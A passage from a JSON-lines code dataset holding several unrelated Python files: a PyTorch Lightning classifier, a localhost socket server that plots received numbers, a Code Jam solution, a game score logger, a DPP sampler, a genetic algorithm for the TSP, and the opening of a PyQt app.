shuffle_features = torch.stack([features[i] for i in shuffle_indices], dim=0)\n # size of shuffle_feature is [16, 768]\n\n concat_features = torch.cat((features, shuffle_features), dim=1)\n logits_compare = self.discriminator_layer2(concat_features)\n loss_compare = self.criterion(logits_compare, comparison)\n preds_compare = torch.argmax(logits_compare, dim=1)\n\n loss = loss_4cls + loss_compare * self.hparams.loss_weight\n\n return loss, preds_4cls, preds_compare, comparison, y, loss_compare, loss_compare * self.hparams.loss_weight\n\n def training_step(self, batch, batch_idx):\n\n loss, preds_4cls, preds_compare, comparison, target_4cls, loss_compare, weight_loss_compare = self.step(batch)\n acc = self.train_acc(preds=preds_4cls, target=target_4cls)\n acc_compare = self.train_acc_compare(preds=preds_compare, target=comparison)\n\n self.log(\"train/loss\", loss, on_step=True, on_epoch=True, prog_bar=False)\n self.log(\"train/loss_compare\", loss_compare, on_step=True, on_epoch=True, prog_bar=False)\n self.log(\"train/weight_loss_compare\", weight_loss_compare, on_step=True, on_epoch=True, prog_bar=False)\n self.log(\"train/acc\", acc, on_step=True, on_epoch=True, prog_bar=True)\n self.log(\"train/acc_compare\", acc_compare, on_step=True, on_epoch=True, prog_bar=True)\n self.log(\"LearningRate\", self.optimizer.param_groups[0][\"lr\"])\n\n return {\n \"loss\": loss,\n \"acc\": acc,\n \"preds\": preds_4cls,\n \"targets\": target_4cls,\n \"acc_compare\": acc_compare,\n \"preds_compare\": preds_compare,\n \"comparison\": comparison,\n }\n\n def training_epoch_end(self, outputs: List[Any]):\n # `outputs` is a list of dicts returned from 
`training_step()`\n sch = self.lr_schedulers()\n # If the selected scheduler is a ReduceLROnPlateau scheduler.\n if isinstance(sch, torch.optim.lr_scheduler.ReduceLROnPlateau):\n sch.step(self.trainer.callback_metrics[\"val/loss\"])\n\n def validation_step(self, batch, batch_idx):\n\n loss, preds_4cls, preds_compare, comparison, target_4cls, loss_compare, weight_loss_compare = self.step(batch)\n acc = self.val_acc(preds_4cls, target_4cls)\n f1 = self.f1_score(preds_4cls, target_4cls)\n acc_compare = self.val_acc_compare(preds=preds_compare, target=comparison)\n\n self.log(\"val/loss\", loss, on_step=False, on_epoch=True, prog_bar=True)\n self.log(\"val/loss_compare\", loss_compare, on_step=True, on_epoch=True, prog_bar=False)\n self.log(\"val/weight_loss_compare\", weight_loss_compare, on_step=True, on_epoch=True, prog_bar=False)\n self.log(\"val/acc\", acc, on_step=False, on_epoch=True, prog_bar=True)\n self.log(\"val/acc_compare\", acc_compare, on_step=False, on_epoch=True, prog_bar=True)\n self.log(\"val/f1\", f1, on_step=False, on_epoch=True, prog_bar=True)\n\n return {\n \"loss\": loss,\n \"acc\": acc,\n \"preds\": preds_4cls,\n \"targets\": target_4cls,\n \"acc_compare\": preds_compare,\n \"preds_compare\": preds_compare,\n \"comparison\": comparison,\n \"f1\": f1,\n }\n\n def validation_epoch_end(self, outputs):\n # called at the end of the validation epoch\n # outputs is an array with what you returned in validation_step for each batch\n # outputs = [{'loss': batch_0_loss}, {'loss': batch_1_loss}, ..., {'loss': batch_n_loss}]\n f1 = self.f1_score.compute()\n self.val_f1_best.update(f1)\n\n acc = self.val_acc.compute()\n self.val_acc_best.update(acc)\n\n\n self.log(\"val/acc_best\", self.val_acc_best.compute(), on_epoch=True, prog_bar=True)\n self.log(\"val/f1_best\", self.val_f1_best.compute(), on_epoch=True, prog_bar=True)\n\n acc_compare = self.val_acc_compare.compute()\n self.val_acc_compare_best.update(acc_compare)\n self.log(\n \"val/acc_compare_best\",\n self.val_acc_compare_best.compute(),\n on_epoch=True,\n prog_bar=True,\n )\n\n def test_step(self, batch, batch_idx):\n\n loss, preds_4cls, preds_compare, comparison, target_4cls, loss_compare, weight_loss_compare = self.step(batch)\n self.confusion_matrix(preds_4cls, target_4cls)\n self.f1_score(preds_4cls, target_4cls)\n self.cohen_kappa(preds_4cls, target_4cls)\n\n acc = self.test_acc(preds_4cls, target_4cls)\n acc_compare = self.test_acc_compare(preds_compare, comparison)\n self.log(\"test/loss\", loss, on_step=False, on_epoch=True)\n self.log(\"test/acc\", acc, on_step=False, on_epoch=True)\n self.log(\"test/acc_compare\", acc_compare, on_step=False, on_epoch=True)\n\n return {\n \"loss\": loss,\n \"acc\": acc,\n \"preds\": preds_4cls,\n \"targets\": target_4cls,\n \"acc_compare\": preds_compare,\n \"preds_compare\": preds_compare,\n \"comparison\": comparison,\n }\n\n def test_epoch_end(self, outputs):\n\n cm = self.confusion_matrix.compute()\n f1 = self.f1_score.compute()\n qwk = self.cohen_kappa.compute()\n p = get_confmat(cm)\n\n self.logger.experiment.log({\"test/conf_matrix\": wandb.Image(p)})\n self.log(\"test/f1_macro\", f1, on_step=False, on_epoch=True)\n self.log(\"test/wqKappa\", qwk, on_step=False, on_epoch=True)\n\n self.test_acc.reset()\n self.confusion_matrix.reset()\n self.f1_score.reset()\n self.cohen_kappa.reset()\n\n def on_epoch_end(self):\n self.train_acc.reset()\n self.val_acc.reset()\n self.test_acc.reset()\n self.train_acc_compare.reset()\n self.val_acc_compare.reset()\n 
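# torchmetrics objects accumulate state across batches, so every metric is\n        # reset once per epoch here to keep train/val/test statistics independent.\n        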
self.test_acc_compare.reset()\n\n    def configure_optimizers(self):\n        self.optimizer = torch.optim.Adam(\n            self.parameters(), lr=self.hparams.lr, weight_decay=self.hparams.weight_decay\n        )\n        self.scheduler = self.get_scheduler()\n        if isinstance(self.scheduler, torch.optim.lr_scheduler.ReduceLROnPlateau):\n            return {\n                \"optimizer\": self.optimizer,\n                \"lr_scheduler\": self.scheduler,\n                \"monitor\": \"val/loss\",\n            }\n\n        return {\"optimizer\": self.optimizer, \"lr_scheduler\": self.scheduler}\n\n    def get_scheduler(self):\n        schedulers = {\n            \"ReduceLROnPlateau\": torch.optim.lr_scheduler.ReduceLROnPlateau(\n                self.optimizer,\n                mode=\"min\",\n                factor=self.hparams.factor,\n                patience=self.hparams.patience,\n                verbose=True,\n                eps=self.hparams.eps,\n            ),\n            \"CosineAnnealingLR\": torch.optim.lr_scheduler.CosineAnnealingLR(\n                self.optimizer, T_max=self.hparams.t_max, eta_min=self.hparams.min_lr, last_epoch=-1\n            ),\n            \"CosineAnnealingWarmRestarts\": torch.optim.lr_scheduler.CosineAnnealingWarmRestarts(\n                self.optimizer,\n                T_0=self.hparams.T_0,\n                T_mult=1,\n                eta_min=self.hparams.min_lr,\n                last_epoch=-1,\n            ),\n            \"StepLR\": torch.optim.lr_scheduler.StepLR(self.optimizer, step_size=200, gamma=0.1),\n            \"ExponentialLR\": torch.optim.lr_scheduler.ExponentialLR(self.optimizer, gamma=0.95),\n        }\n        if self.hparams.scheduler not in schedulers:\n            raise ValueError(f\"Unknown scheduler: {self.hparams.scheduler}\")\n\n        return schedulers.get(self.hparams.scheduler, schedulers[\"ReduceLROnPlateau\"])\n","repo_name":"Leejucheon96/ICCV_2023_CVAMD-Order-ViT-","sub_path":"src/models/classifycompare_module.py","file_name":"classifycompare_module.py","file_ext":"py","file_size_in_byte":13145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42416271351","text":"# The socket module, for network programming\nfrom socket import *\nimport re\nimport matplotlib.pyplot as plt\n# server data\nhost = 'localhost'\nport = 777\naddr = (host,port)\n\n# socket - the socket creation function\n# the first parameter, socket_family, can be AF_INET or AF_UNIX\n# the second parameter, socket_type, can be SOCK_STREAM (for TCP) or SOCK_DGRAM (for UDP)\ntcp_socket = socket(AF_INET, SOCK_STREAM)\n# bind - binds the address and port to the socket\ntcp_socket.bind(addr)\n# listen - starts accepting TCP connections\ntcp_socket.listen(1)\n\n# The program's endless main loop\nwhile True:\n    \n    # in case we want to quit the program\n    question = input('Do you want to quit? y\\\\n: ')\n    if question == 'y': break\n    \n    #print('wait connection...')\n    \n    # accept - accepts a request and establishes a connection (blocking mode by default);\n    # it puts the new connection socket into conn and the client address into addr\n    conn, addr = tcp_socket.accept()\n    print('client addr: ', addr)\n    \n    # recv - receives a TCP message\n    data = conn.recv(1024)\n    datax = bytes.decode(data)\n    \n    x = re.findall('(\\d+)', datax)\n    a = x\n    i=0\n    print (x[1])\n    while i<20:\n        a[i]=int(x[i])\n        print ('x ',a[i])\n        \n        i=i+1\n\n    X=a[0:10]\n    Y=a[10:20]\n    print('x= ',X,'y= ',Y)\n    fig = plt.figure() # create the Figure object\n    print (fig.axes) # the list of current axes is empty\n    print (type(fig)) # type of the Figure object\n    plt.scatter(X, Y) \n    plt.xlabel('X axes');\n    plt.ylabel('Y axes');\n# after drawing a graphic element (the markers),\n# the list of current axes contains one axes object\n    print (fig.axes)\n\n# see the preamble\n    plt.savefig('example.png', fmt='png')\n    data = open('example.png','rb+')\n    #datan = png.encode(data)\n    #plt.show()\n    \n    # if nothing was sent, terminate the program\n    if not data:\n        print('ERROR')\n        conn.close()\n        \n        break\n    else:\n        #print('output: ',data)\n        # send - transmits a TCP message\n        conn.sendfile(data)\n        # close - closes the socket\n        conn.close()\n        data.close()\ntcp_socket.close()\n\n","repo_name":"LokiGoodJoker/client-server","sub_path":"serv.py","file_name":"serv.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23395039251","text":"from math import sqrt\n\nfp = open(\"C-small-attempt0.in\", \"r\")\npf = open(\"out.txt\", \"w\")\n\n\ndef isPalindrome(n):\n\tif n == n[::-1]:\n\t\treturn True\n\treturn False\n\ndef isSquare(n):\n\ts = sqrt(n)\n\tif s == int(s):\n\t\treturn True\n\treturn False\n\nt = int(fp.readline())\n\nfor j in range(0, t):\n\tl = fp.readline()\n\tp = l.split(' ')\n\n\tc = 0\n\t\n\tfor i in range(int(p[0]), int(p[1])+1):\n\t\ts = repr(i)\n\t\tif isPalindrome(s):\n\t\t\tif isSquare(i):\n\t\t\t\tq = repr(int(sqrt(i)))\n\t\t\t\tif isPalindrome(q):\n\t\t\t\t\tc += 1\n\t\n\tpf.write(\"Case #\" + str(j+1) + \": \" + str(c) + \"\\n\")\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/2545.py","file_name":"2545.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11017483078","text":"\n#Packages\n# Standard library imports\nfrom datetime import date\nimport csv \nimport os\nimport numpy as np\nimport pandas as pd\n\n# Local library imports\nimport Juego, logger\n\n\n\n\nclass score(object):\n    \"\"\"Esta clase gestiona la escritura y lectura de los resultados\"\"\"\n    def __init__(self):\n        self.file_name = \"./scores/partidas.csv\"\n        self.columnas = ['fecha', 'nombre_P1', 'nombre_P2', 'ganador', 'jugada_P1', 'jugada_P2']\n        self.df = None\n    \n\n\n    def _write_row(self, msg) -> None:\n        \"\"\"Writes a message to the file_name for a specific Logger instance\"\"\"\n        with open(self.file_name, mode ='a',newline ='\\n') as csvfile:\n            csvwriter = csv.writer(csvfile) \n            csvwriter.writerow(msg)\n        return None\n\n    \n    # lee resultados, escribe\n    # fecha nombre jugador1 nombre jugadore2 ganador jugador1 jugador 2\n\n    def escribir_resultados(self,nombre_jugador_1,nombre_jugador_2,ganador,eleccion_jugador1,eleccion_jugador2)-> None:\n        \"\"\"Escribe el resultado de una partida en el csv 
scores\"\"\"\n #nombre_jugador_1 ='adry'\n #nombre_jugador_2 ='NPC'\n #ganador = 1\n #eleccion_jugador1 = 'Piedra'\n #eleccion_jugador2 = 'Tijera'\n \n today = date.today()\n hoy = today.strftime(\"%Y-%m-%d\")\n row = [hoy,nombre_jugador_1,nombre_jugador_2,ganador,eleccion_jugador1,eleccion_jugador2 ]\n self._write_row(row)\n\n return None \n \n def leer(self)-> None:\n\n \"\"\"Lee valores de resultados pasados y los escribe como un dataframe llamado results\"\"\"\n results = pd.DataFrame(columns = self.get_columns())\n columnas = self.get_columns()\n with open(self.file_name, mode ='r',newline ='\\n') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',')\n \n for row in spamreader:\n aux = np.array(row).reshape(1,len(columnas))\n df_aux = pd.DataFrame(aux, columns=columnas)\n results = pd.concat([results,df_aux])\n self.set_df(results)\n return None \n\n\n def Tops(self)-> pd.DataFrame:\n \"\"\"calculo de tops: pctge de victorias , numero victorias, numero de partidas \"\"\"\n df = self.get_df().copy()\n\n #procesamiento de datos\n dfa = pd.concat([df['nombre_P1'].value_counts().rename('Partidas'),df.groupby('nombre_P1')['ganador'].sum().rename('Victorias')], axis=1)\n\n dfa['pctge_Victorias'] = dfa['Victorias']/dfa['Partidas']\n dfa.sort_values(by=['pctge_Victorias'], ascending=False,inplace =True)\n dfa = dfa[['pctge_Victorias','Victorias','Partidas']]\n return dfa\n\n def get_columns(self)-> list:\n return self.columnas\n\n def get_df(self)-> pd.DataFrame:\n aux = self.df\n aux['ganador'] = aux['ganador'].astype('int64')\n return aux\n \n def set_df(self,df)-> None:\n self.df = df\n return None\n\nif __name__ == '__main__':\n print(\"Hellowis\")","repo_name":"adryCrespo/JankenPo","sub_path":"bin/Scores.py","file_name":"Scores.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"743205490","text":"import sys\r\ngroups = {}\r\noperations = {\"difference\", \"union\", \"intersection\"}\r\ndef operation(op, a, b, stack):\r\n if op == \"difference\":\r\n ans = a.difference(b)\r\n stack.append(ans)\r\n elif op == \"union\":\r\n ans = a.union(b)\r\n stack.append(ans)\r\n else:\r\n ans = a.intersection(b)\r\n stack.append(ans)\r\nfor i in sys.stdin.readlines():\r\n stack = []\r\n line = i.strip().split()\r\n if line[0] == 'group':\r\n groups[line[1]] = set(line[3:])\r\n else:\r\n line.reverse()\r\n for val in line:\r\n if val not in operations:\r\n stack.append(groups[val])\r\n else:\r\n a = stack.pop()\r\n b = stack.pop()\r\n operation(val,a,b,stack)\r\n ret = []\r\n for item in stack:\r\n for k in item:\r\n ret.append(k)\r\n print(\" \".join(sorted(ret)))\r\n","repo_name":"DragonOfTheEast/kattisProblems","sub_path":"selectgroup.py","file_name":"selectgroup.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33208328660","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Function\nfrom torch.autograd import StochasticFunction\nfrom torch.autograd import Variable\n\nimport dpp_nets.dpp as dpp\nfrom dpp_nets.my_torch.utilities import omit_slice\nfrom dpp_nets.my_torch.utilities import orthogonalize\n\nclass DPP_Numpy(Function):\n \"\"\"\n Uses Numpy Functions to sample from the DPP implicitly \n defined through embd, returns score as a gradient in the\n backward computation (needs to be complemented by hooks\n for REINFORCE or control variate training)\n\n 
Arguments:\n Depending on whether you're training Double or Float, provide\n dtype = torch.FloatTensor\n dtype = torch.DoubleTensor\n \"\"\"\n def __init__(self, dtype):\n self.dtype = dtype\n\n def forward(self, embd):\n\n \t# Perform SVD to get eigenvalue decomposition of L\n u1, s, u2 = torch.svd(embd)\n e = torch.pow(s,2).numpy()\n v = u1.numpy()\n\n # Sample subset from the DPP\n subset = torch.from_numpy(dpp.sample_dpp(e, v, one_hot=True))\n subset = subset.type(self.dtype)\n\n # Save tensors for backward (gradient computation)\n self.save_for_backward(embd, subset)\n\n return subset\n \n def backward(self, grad_output):\n embd, subset = self.saved_tensors\n embd, subset = embd.numpy(), subset.numpy()\n\n score = torch.from_numpy(dpp.score_dpp(embd, subset))\n score = score.type(self.dtype)\n\n return score\n\nclass DPPLayer_Numpy(nn.Module):\n \"\"\"\n Uses Numpy Functions to sample from the DPP implicitly \n defined through embd, returns score as a gradient in the\n backward computation (needs to be complemented by hooks\n for REINFORCE or control variate training)\n\n Arguments:\n Depending on whether you're training Double or Float, provide\n dtype = torch.FloatTensor\n dtype = torch.DoubleTensor\n \"\"\"\n def __init__(self, dtype):\n super(DPPLayer_Numpy, self).__init__()\n self.dtype = dtype\n\n def forward(self, embd):\n return DPP_Numpy(self.dtype)(embd)\n\n\nclass DPP(StochasticFunction):\n \n def forward(self, vals, vecs):\n\n # Sometimes orthogonalization fails (i.e. deletes vectors)\n # In that case just retry!\n self.dtype = vals.type()\n\n while True:\n try:\n # Set-up\n n = vecs.size(0)\n n_vals = vals.size(0)\n\n # Sample a set size\n index = (vals / (vals + 1)).bernoulli().byte()\n k = torch.sum(index)\n\n # Check for empty set\n if not k:\n subset = vals.new().resize_(n).copy_(torch.zeros(n))\n self.save_for_backward(vals, vecs, subset) \n return subset\n \n # Check for full set\n if k == n:\n subset = vals.new().resize_(n).copy_(torch.ones(n))\n self.save_for_backward(vals, vecs, subset) \n return subset\n\n # Sample a subset\n V = vecs[index.expand_as(vecs)].view(n, -1)\n subset = vals.new().resize_(n).copy_(torch.zeros(n))\n \n while subset.sum() < k:\n\n # Sample an item\n probs = V.pow(2).sum(1, keepdim=True).t()\n item = probs.multinomial(1)[0,0]\n subset[item] = 1\n \n # CHeck if we got k items now\n if subset.sum() == k:\n break\n\n # Choose eigenvector to eliminate\n j = V[item, ].abs().sign().unsqueeze(1).t().multinomial(1)[0,0]\n Vj = V[:, j]\n \n # Update vector basis\n V = omit_slice(V,1,j)\n V.sub_(Vj.ger(V[item, :] / Vj[item]))\n\n # Orthogonalize vector basis\n V, _ = torch.qr(V)\n \n self.save_for_backward(vals, vecs, subset) \n\n return subset\n except RuntimeError:\n print(\"RuntimeError\")\n continue\n \n break\n \n def backward(self, reward):\n #TODO: Need to check this!\n # Checked it! 
Looks good.\n\n # Set-up\n if False:\n vals, vecs, subset = self.saved_tensors#\n dtype = self.dtype\n n = vecs.size(0)\n n_vals = vals.size(0)\n subset_sum = subset.long().sum()\n\n # auxillary\n matrix = vecs.mm(vals.diag()).mm(vecs.t())\n P = torch.eye(n).type(dtype).masked_select(subset.expand(n,n).t().byte()).view(subset_sum, -1).type(dtype)\n submatrix = P.mm(matrix).mm(P.t())\n subinv = torch.inverse(submatrix)\n Pvecs = P.mm(vecs)\n \n # gradiens\n grad_vals = 1 / vals\n grad_vals += Pvecs.t().mm(subinv).mm(Pvecs).diag()\n grad_vecs = P.t().mm(subinv).mm(Pvecs).mm(vals.diag())\n\n grad_vals.mul_(reward)\n grad_vecs.mul_(reward)\n\n return grad_vals, grad_vecs\n\n if False:\n vals, vecs, subset = self.saved_tensors#\n dtype = self.dtype\n n = vecs.size(0)\n n_vals = vals.size(0)\n subset_sum = subset.long().sum()\n\n grad_vals = 1 / vals\n grad_vecs = torch.zeros(n, n_vals).type(dtype)\n\n if subset_sum:\n # auxillary\n matrix = vecs.mm(vals.diag()).mm(vecs.t())\n print(matrix) ## remove later\n print('Size of matrix', matrix.size()) ## remove later\n print('Subset Sum', subset_sum) ## remove later\n print('n', n) ## remove later\n print('n_vals', n_vals) ## remove later\n print('dtype', dtype)\n print('1 P', torch.eye(n).type(dtype))\n print('2 P', subset.expand(n,n).t().byte())\n print('3 P', torch.eye(n).type(dtype).masked_select(subset.expand(n,n).t().byte()))\n P = torch.eye(n).type(dtype).masked_select(subset.expand(n,n).t().byte()).view(subset_sum, -1).type(dtype)\n submatrix = P.mm(matrix).mm(P.t())\n subinv = torch.inverse(submatrix)\n Pvecs = P.mm(vecs)\n print('backwarded once.')\n\n grad_vals += Pvecs.t().mm(subinv).mm(Pvecs).diag()\n grad_vecs += P.t().mm(subinv).mm(Pvecs).mm(vals.diag()) \n\n grad_vals.mul_(reward)\n grad_vecs.mul_(reward)\n\n return grad_vals, grad_vecs\n\n vals, vecs, subset = self.saved_tensors\n\n dtype = self.dtype\n n = vecs.size(0)\n n_vals = vals.size(0) # \n subset_sum = subset.long().sum() # How large is the subset?\n\n # grad_vals = 1 / vals\n # grad_vecs = torch.zeros(n, n_vals).type(dtype)\n \n grad_vals = 1 / vals\n grad_vecs = vecs.new().resize_(n, n_vals).copy_(torch.zeros(n, n_vals))\n\n try:\n if subset_sum:\n running_ix = subset.new().resize_(n).copy_(torch.arange(0,n))\n ix = (subset * running_ix).nonzero().squeeze()\n Pvecs = vecs[ix,:].squeeze(1)\n\n submatrix = Pvecs.mm(vals.diag()).mm(Pvecs.t())\n subinv = torch.inverse(submatrix)\n\n grad_vals += Pvecs.t().mm(subinv).mm(Pvecs).diag()\n grad_vecs[ix,:] += subinv.mm(Pvecs).mm(vals.diag()) \n\n grad_vals.mul_(reward)\n grad_vecs.mul_(reward)\n \n except RuntimeError:\n grad_vals.copy_(torch.zeros(n_vals))\n grad_vecs.copy_(torch.zeros(n, n_vals))\n print('An Error occured. Sub-Routine.')\n \n finally:\n return grad_vals, grad_vecs\n\nclass AllInOne(StochasticFunction):\n \n def forward(self, kernel):\n self.dtype = kernel.type()\n\n vecs, vals, _ = torch.svd(kernel)\n vals.pow_(2)\n\n # Sometimes orthogonalization fails (i.e. 
deletes vectors)\n # In that case just retry!\n while True:\n try:\n # Set-up\n n = vecs.size(0)\n n_vals = vals.size(0)\n\n # Sample a set size\n index = (vals / (vals + 1)).bernoulli().byte()\n k = torch.sum(index)\n\n # Check for empty set\n if not k:\n subset = vals.new().resize_(n).copy_(torch.zeros(n))\n self.save_for_backward(kernel, subset) \n return subset\n \n # Check for full set\n if k == n:\n subset = vals.new().resize_(n).copy_(torch.ones(n))\n self.save_for_backward(kernel, subset) \n return subset\n\n # Sample a subset\n V = vecs[index.expand_as(vecs)].view(n, -1)\n subset = vals.new().resize_(n).copy_(torch.zeros(n))\n \n while subset.sum() < k:\n\n # Sample an item\n probs = V.pow(2).sum(1, keepdim=True).t()\n item = probs.multinomial(1)[0,0]\n subset[item] = 1\n \n # CHeck if we got k items now\n if subset.sum() == k:\n break\n\n # Choose eigenvector to eliminate\n j = V[item, ].abs().sign().unsqueeze(1).t().multinomial(1)[0,0]\n Vj = V[:, j]\n \n # Update vector basis\n V = omit_slice(V,1,j)\n V.sub_(Vj.ger(V[item, :] / Vj[item]))\n\n # Orthogonalize vector basis\n V, _ = torch.qr(V)\n\n except RuntimeError:\n print(\"RuntimeError, Orthogonalization failed presumably.\")\n continue\n break\n \n self.save_for_backward(kernel, subset) \n \n return subset\n \n def backward(self, reward):\n #TODO: Need to check this!\n # Checked it! Looks good.\n\n # Set-up\n kernel, subset = self.saved_tensors\n dtype = self.dtype\n\n n, kernel_dim = kernel.size()\n subset_sum = subset.long().sum() \n grad_kernel = torch.zeros(kernel.size()).type(dtype)\n\n if subset_sum:\n # auxillary\n P = torch.eye(n).type(dtype).masked_select(subset.expand(n,n).t().byte()).view(subset_sum, -1).type(dtype)\n subembd = P.mm(kernel)\n submatrix = subembd.mm(subembd.t())\n submatinv = torch.inverse(submatrix)\n subgrad = 2 * submatinv.mm(subembd)\n subgrad = P.t().mm(subgrad)\n grad_kernel.add_(subgrad)\n \n # Gradient from whole L matrix\n K = kernel.t().mm(kernel) # not L!\n I_k = torch.eye(kernel_dim).type(dtype)\n I = torch.eye(n).type(dtype)\n inv = torch.inverse(I_k + K)\n B = I - kernel.mm(inv).mm(kernel.t())\n grad_from_full = 2 * B.mm(kernel)\n grad_kernel.sub_(grad_from_full)\n\n grad_kernel.mul_(reward)\n\n return grad_kernel\n\n","repo_name":"mbp28/dpp_nets","sub_path":"dpp_nets/my_torch/DPP.py","file_name":"DPP.py","file_ext":"py","file_size_in_byte":11388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10181352940","text":"import random\nimport numpy as np\n\n\nclass AG:\n def __init__(self, npop, ngen, nelite, has_elite, pc, pm, tsp):\n self.npop = npop\n self.ngen = ngen\n self.nelite = nelite\n self.pc = pc\n self.pm = pm\n self.tsp = tsp\n self.stagnation = 0\n self.high_mutation_interation = 0\n\n self.pop = list()\n self.inter_pop = list()\n self.elite = list()\n self.has_elite = has_elite\n self.fit_elite = 0\n print('aqui')\n for i in range(npop):\n genes = list()\n for i in range(self.tsp.n):\n genes.append(0)\n self.pop.append(genes)\n self.inter_pop.append(genes)\n\n def create_initial_pop(self):\n for i in range(self.npop):\n\n in_path = list()\n for k in range(self.tsp.n):\n in_path.append(False)\n\n j = 0\n while j < self.tsp.n:\n node = random.randint(0, self.tsp.n-1)\n if in_path[node] == True:\n continue\n self.pop[i][j] = node\n in_path[node] = True\n j += 1\n\n def get_fo(self, path):\n total = 0\n for p in range(len(path)):\n if p != (len(path)-1):\n total += self.tsp.get_distance(path[p], path[p+1])\n try:\n 
total += self.tsp.get_distance(path[len(path)-1], path[0])\n except:\n return 0\n\n return total\n\n def evaluate_pop(self, pop):\n fit = list()\n for i in range(self.npop):\n fit.append(self.get_fo(pop[i]))\n\n return fit\n\n def roullet(self, fit):\n total = 0\n for f in fit:\n total += 1/f\n\n rou = list()\n for f in fit:\n rou.append((1/f)/total)\n\n first_parent = 0\n second_parent = 0\n\n for i in range(2):\n value = random.uniform(0, 1)\n rou_sum = 0\n nparent = 0\n for j in range(self.npop):\n if rou_sum >= value:\n if i == 0:\n first_parent = nparent\n else:\n second_parent = nparent\n if second_parent == first_parent:\n j = 0\n value = random.uniform(0, 1)\n rou_sum = 0\n nparent = 0\n continue\n break\n rou_sum += rou[j]\n nparent += 1\n\n return first_parent, second_parent\n\n def get_parents(self, fit):\n parents = list()\n n_parents = 0\n while n_parents < self.npop:\n first_parent, second_parent = self.roullet(fit)\n parents.append(first_parent)\n parents.append(second_parent)\n n_parents += 2\n\n return parents\n\n def get_wrost_fit(self):\n fit = self.evaluate_pop(self.inter_pop)\n\n max_fit = max(fit)\n p_max = fit.index(max_fit)\n\n return p_max, max_fit\n\n def get_best_fit(self, fit):\n min_fit = min(fit)\n\n return min_fit, fit.index(min_fit)\n\n def cross(self, first_parent, second_parent):\n children = list()\n for i in range(self.tsp.n):\n children.append(-1)\n\n delta = 0\n first_slice = 0\n second_slice = 0\n while delta == 0:\n first_slice = random.randint(0, self.tsp.n-1)\n second_slice = random.randint(first_slice, self.tsp.n-1)\n delta = second_slice - first_slice\n\n children[first_slice:second_slice] = first_parent[first_slice:second_slice]\n order_parent = list()\n for gene in second_parent:\n if (gene in children) == False:\n order_parent.append(gene)\n\n order = 0\n for j in range(second_slice, self.tsp.n):\n children[j] = order_parent[order]\n order += 1\n\n for j in range(0, first_slice):\n children[j] = order_parent[order]\n order += 1\n\n return children\n\n def crossover(self, parents, fit):\n children = 0\n\n for i in range(0, len(parents), 2):\n first_parent = self.pop[parents[i]]\n second_parent = self.pop[parents[i+1]]\n\n first_children = self.cross(first_parent, second_parent)\n second_children = self.cross(second_parent, first_parent)\n\n if random.uniform(0, 1) <= self.pc:\n self.inter_pop[children] = first_children\n self.inter_pop[children+1] = second_children\n else:\n self.inter_pop[children] = first_parent\n self.inter_pop[children+1] = second_parent\n\n children += 2\n\n def mutation(self):\n for individual in self.inter_pop:\n value = random.uniform(0, 1)\n if self.high_mutation_interation == 0:\n if value <= self.pm:\n i = -1\n j = -1\n while i == j:\n i = random.randint(0, len(individual)-1)\n j = random.randint(0, len(individual)-1)\n\n aux = individual[i]\n individual[i] = individual[j]\n individual[j] = aux\n else:\n #print('Alta mutação!!!!!!!!!!!!!!!!!!!!!!!!!!')\n if value <= 0.2:\n i = -1\n j = -1\n while i == j:\n i = random.randint(0, len(individual)-1)\n j = random.randint(0, len(individual)-1)\n\n aux = individual[i]\n individual[i] = individual[j]\n individual[j] = aux\n self.high_mutation_interation += 1\n\n def get_elite(self, g, fit):\n best_fit, p_best = self.get_best_fit(fit)\n\n if g == 0:\n self.elite = self.pop[p_best].copy()\n self.fit_elite = best_fit\n else:\n if best_fit < self.fit_elite:\n self.elite = self.pop[p_best].copy()\n self.fit_elite = best_fit\n else:\n self.stagnation += 1\n if self.stagnation == 
500:\n self.stagnation = 0\n self.high_mutation_interation = 1\n\n if self.high_mutation_interation == 4:\n self.high_mutation_interation = 0\n\n pos = random.randint(0, self.npop-1)\n self.pop[pos] = self.elite\n\n def get_parcial_statics(self, statics_dict, gen, fit):\n gen_statics = dict()\n gen_statics[\"Media\"] = np.median(fit)\n gen_statics[\"DSVP\"] = np.std(fit)\n statics_dict[str(gen)] = gen_statics\n\n def init(self):\n self.create_initial_pop()\n history = list()\n statics_dict = dict()\n\n generation = 0\n while generation < self.ngen:\n fit = self.evaluate_pop(self.pop)\n parents = self.get_parents(fit)\n self.crossover(parents=parents, fit=fit)\n self.mutation()\n self.get_parcial_statics(statics_dict, generation, fit)\n self.pop = self.inter_pop\n fit = self.evaluate_pop(self.pop)\n if self.has_elite == 1:\n self.get_elite(generation, fit)\n fit = self.evaluate_pop(self.pop)\n best_fit, _ = self.get_best_fit(fit)\n history.append((best_fit, generation))\n '''\n print('-' * 25)\n print('Geração = ' + str(generation))\n print('Elite = ' + str(self.fit_elite))\n print('Melhor sol da Geração = ' + str(best_fit))\n print('-' * 25)\n # input('OK>')\n '''\n generation += 1\n\n return history, statics_dict\n","repo_name":"LucasVidigal98/Bio-Inspired-Algorithms","sub_path":"TSP/src/AG.py","file_name":"AG.py","file_ext":"py","file_size_in_byte":7880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31768492777","text":"import sys\nimport os\nsys.path.append(\"bin\")\nsys.path.append(\"bin/measure\")\nsys.path.append(\"bin/professor\")\n\nimport toolbar_rc\nfrom PyQt5 import QtCore, QtGui, QtWidgets,uic\nfrom PyQt5.QtGui import QIcon, QPixmap\nfrom menu_functions import mainmenu_funcs\nfrom menu_objects import mainmenu_objects\nfrom log import gui_log,errorlog\nfrom professor import professor\n\nglobal mmf\nmmf = mainmenu_funcs()\nmmo = mainmenu_objects()\ndef version_control():\n app_version = 